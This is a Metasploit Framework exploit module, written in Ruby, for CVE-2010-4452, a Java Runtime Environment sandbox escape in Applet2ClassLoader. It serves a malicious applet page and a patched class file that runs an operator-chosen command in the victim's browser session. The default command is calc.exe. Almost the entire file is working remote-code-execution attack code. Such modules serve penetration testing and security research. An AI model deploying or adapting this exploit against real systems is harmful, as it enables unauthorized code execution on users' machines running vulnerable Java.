### $Id: java_codebase_trust.rb 11983 2011-03-16 05:01:29Z jduck $##### This file is part of the Metasploit Framework and may be subject to# redistribution and commercial restrictions. Please see the Metasploit# Framework web site for more information on licensing and terms of use.# http://metasploit.com/framework/##require 'msf/core'require 'rex'class Metasploit3 < Msf::Exploit::Remote	Rank = ExcellentRanking	include Msf::Exploit::Remote::HttpServer::HTML	def initialize( info = {} )		super( update_info( info,			'Name'          => 'Sun Java Applet2ClassLoader Remote Code Execution Exploit',			'Description'   => %q{					This module exploits a vulnerability in Java Runtime Environment				that allows an attacker to escape the Java Sandbox. By supplying a 				codebase that points at a trusted directory and a code that is a URL that				does not contain an dots an applet can run without the sandbox.				The vulnerability affects version 6 prior to update 24.			},			'License'       => MSF_LICENSE,			'Author'        => [					'Frederic Hoguin', # Discovery, PoC					'jduck'            # Metasploit module				],			'Version'       => '$Revision: 11983 $',			'References'    =>				[					[ 'CVE', '2010-4452' ],					# [ 'OSVDB', '' ],					[ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-11-084/' ],					[ 'URL', 'http://fhoguin.com/2011/03/oracle-java-unsigned-applet-applet2classloader-remote-code-execution-vulnerability-zdi-11-084-explained/' ],					[ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpufeb2011-304611.html' ]				],			'Platform'      => [ 'java', 'win' ],			'Payload'       => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },			'Targets'       =>				[					# OK on Windows x86 + IE + Sun Java 1.6.0u21,u22,u23					# FAIL on Ubuntu x86 + Firefox + Sun Java 1.6.0u23					[ 'Automatic (no payload)', { } ]=begin					[ 'Windows x86',						{							'Arch' => ARCH_X86,							'Platform' => 'win',						}					],					[ 'Generic (Java Payload)',						{							'Arch' => ARCH_JAVA,							'Platform' => 'java',						}					],=end				],			'DefaultTarget'  => 0,			'DisclosureDate' => 'Feb 15 2011'			))			register_options(			[				OptString.new('CMD', [ false,  "Command to run.", "calc.exe"]),				OptString.new('LIBPATH', [ false,  "The codebase path to use (privileged)",					"C://Program Files//java//jre6//lib//ext"]),			], self.class)	end	def exploit		path = [ Msf::Config.data_directory, "exploits", "cve-2010-4452", "AppletX.class" ].join(::File::SEPARATOR)		@java_class = nil		File.open(path, "rb") { |fd|			@java_class = fd.read(fd.stat.size)		}		if not @java_class			raise RuntimeError, "Unable to load java class"		end		super	end	def on_request_uri(cli, request)		#print_status("Received request: #{request.uri}")		jpath = get_uri(cli)		#print_status(jpath)		# Do what get_uri does so that we can replace it in the string		host = Rex::Socket.source_address(cli.peerhost)		host_num = Rex::Socket.addr_aton(host).unpack('N').first		codebase = "file:" + datastore['LIBPATH']		code_url = jpath.sub(host, host_num.to_s)		cmd = datastore['CMD']		cmd_off = 0xb4		cn_off = 0xfc		case request.uri		when //.class$/			#p = regenerate_payload(cli)			print_status("Sending class file to #{cli.peerhost}:#{cli.peerport}...")			cls = @java_class.dup			cls[cmd_off,2] = [cmd.length].pack('n')			cls[cmd_off+2,8] = cmd			cn_off += (cmd.length - 8)  # the original length was 8 (calc.exe)			cls[cn_off,2] = [code_url.length].pack('n')			cls[cn_off+2,7] = code_url			#File.open('ughz.class', 'wb') { |fd| fd.write cls }			send_response(cli, cls, { 'Content-Type' => "application/octet-stream" })			handler(cli)		else			html = <<-EOS<html><body><applet codebase="#{codebase}" code="#{code_url}" /></body></html>EOS			print_status("Sending HTML file to #{cli.peerhost}:#{cli.peerport}...")			send_response_html(cli, html)			handler(cli)		end	endend